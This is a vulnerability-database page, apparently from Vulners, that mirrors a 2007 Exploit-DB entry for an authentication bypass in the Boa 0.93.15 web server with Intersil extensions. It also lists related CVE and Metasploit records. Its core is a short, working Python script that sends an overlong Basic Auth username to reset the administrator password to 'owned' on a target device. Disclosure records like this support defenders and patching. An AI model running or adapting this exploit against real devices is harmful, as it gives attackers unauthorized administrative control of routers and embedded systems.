Lucene search
+L

Boa 0.93.15 - HTTP Basic Authentication Bypass

🗓️ 16 Oct 2007 00:00:00Reported by ikkiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 127 Views

Boa HTTP Basic Authentication Bypass - Vuln: Boa/0.93.15 (with Intersil Extensions) - Exploi

Related
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Improper Input Validation in Boa Boa_Webserver
3 Feb 202616:18
githubexploit
circl
Circl
CVE-2007-4915
29 May 201815:50
circl
cve
CVE
CVE-2007-4915
17 Sep 200717:00
cve
cvelist
Cvelist
CVE-2007-4915
17 Sep 200717:00
cvelist
exploitdb
Exploit DB
Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass
14 Sep 200700:00
exploitdb
metasploit
Metasploit
Intersil (Boa) HTTPd Basic Authentication Password Reset
17 Jun 201202:14
metasploit
nvd
NVD
CVE-2007-4915
17 Sep 200717:17
nvd
packetstorm
Packet Storm
Intersil (Boa) HTTPd Basic Authentication Password Reset
31 Aug 202400:00
packetstorm
prion
Prion
Cross site request forgery (csrf)
17 Sep 200717:17
prion
/*
 * Boa HTTP Basic Authentication Bypass
 * Vuln: Boa/0.93.15 (with Intersil Extensions)
 *
 * Original Advisory:
 * http://www.securityfocus.com/archive/1/479434
 * http://www.ikkisoft.com/stuff/SN-2007-02.txt
 *
 *  Luca "ikki" Carettoni
 *  http://www.ikkisoft.com
 */

----

#!/usr/bin/env python
import urllib2

SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME
= 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'

auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')

# milw0rm.com [2007-10-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation